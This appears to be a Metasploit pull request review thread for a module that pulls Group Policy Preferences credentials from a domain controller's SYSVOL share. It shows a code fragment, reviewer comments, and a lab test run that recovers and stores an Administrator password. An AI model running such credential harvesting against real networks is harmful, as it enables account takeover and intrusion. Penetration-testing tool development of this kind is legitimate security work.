### PR TITLE
SMB GPP AUX Enumeration

### PR DESCRIPTION
**Pull request by jabra-**
This module adds the ability to enumerate GPP credentials from the domain controller by using normal domain credentials. This have been verified on Win2k8 R2 DC. The found credentials are stored in the database.

### CODE REVIEW

**Comment by Meatballs1** [comment]
+1 I normally just use SMBClient :)

**Comment by jabra-** [comment]
@bcook-r7 is it possible for you to take a look at this? Thanks!

File: modules/auxiliary/scanner/smb/smb_enum_gpp.rb [hunk 1]
```diff
@@ -0,0 +1,216 @@
...
+      end
+
+      subfolder_listing = self.simple.client.find_first("#{corpdomain}\\Policies\\*")
+      subfolders = []
+      subfolder_listing.each_pair do |key,val|
+        next if key == '.' or  key == '..'
+        subfolders << key
+      end
+
+      subfolders.each do |i|
```
Comment (hmoore-r7) [inline modules/auxiliary/scanner/smb/smb_enum_gpp.rb]: Maybe create an array and iterate vs calling the function repeatedly with an explicit list of paths?

**Comment by jabra-** [comment]
@hmoore-r7 updated based on your feedback.

**Comment by jabra-** [comment]
i believe this is ready to be merged. @jvazquez-r7 @hmoore-r7 @bcook-r7

**Comment by jvazquez-r7** [comment]
Thanks @jabra- ! Did some code cleanup and landed! See final code here: https://github.com/rapid7/metasploit-framework/commit/927785cfe4315053c084743bd1962b8d0fe0f02a

Test after changes:

```
msf auxiliary(smb_enum_gpp) > show options

Module options (auxiliary/scanner/smb/smb_enum_gpp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     172.16.158.211   yes       The target address range or CIDR identifier
   RPORT      445              yes       The Target port
   SMBDomain  DEMO             no        The Windows domain to use for authentication
   SMBPass    Admin1234.       no        The password for the specified username
   SMBSHARE   SYSVOL           yes       The name of the share on the server
   SMBUser    test             no        The username to authenticate as
   STORE      true             yes       Store the enumerated files in loot.
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_enum_gpp) > workspace -d test
[*] Deleted workspace: test
[*] Switched workspace: default
msf auxiliary(smb_enum_gpp) > workspace -a test
[*] Added workspace: test
msf auxiliary(smb_enum_gpp) > run

[*] Connecting to the server...
[*] Mounting the remote share \\172.16.158.211\SYSVOL'...
[+] Found Policy Share on 172.16.158.211
[*] Parsing file: \\172.16.158.211\SYSVOL\demo.local\Policies\{CA7E147E-AB9B-4E0A-A6FB-2025E1F2AE87}\MACHINE\Preferences\Groups\Groups.xml
[+] Group Policy Credential Info
============================

 Name               Value
 ----               -----
 TYPE               Groups.xml
 USERNAME           Administrator (built-in)
 PASSWORD           Admin1234.
 DOMAIN CONTROLLER  172.16.158.211
 DOMAIN             demo.local
 CHANGED            2015-09-17 01:45:17
 NEVER_EXPIRES?     0
 DISABLED           0

[*] XML file saved to: /Users/jvazquez/.msf4/loot/20150916205859_test_172.16.158.211_windows.gpp.xml_537950.txt
[+] Groups.xml saved as: /Users/jvazquez/.msf4/loot/20150916205859_test_172.16.158.211_smb.shares.file_871371.xml
[+] Found Policy Share on 172.16.158.211
[*] Parsing file: \\172.16.158.211\SYSVOL\demo.local\Policies\{CA7E147E-AB9B-4E0A-A6FB-2025E1F2AE87}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] ScheduledTasks.xml saved as: /Users/jvazquez/.msf4/loot/20150916205859_test_172.16.158.211_smb.shares.file_198919.xml
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_enum_gpp) > hosts

Hosts
=====

address         mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---  ----  -------  ---------  -----  -------  ----  --------
172.16.158.211

msf auxiliary(smb_enum_gpp) > services

Services
========

host            port  proto  name  state  info
----            ----  -----  ----  -----  ----
172.16.158.211  445   tcp    smb   open

msf auxiliary(smb_enum_gpp) > creds
Credentials
===========

host            origin          service        public         private     realm  private_type
----            ------          -------        ------         -------     -----  ------------
172.16.158.211  172.16.158.211  445/tcp (smb)  Administrator  Admin1234.         Password

```

**Pull request merged**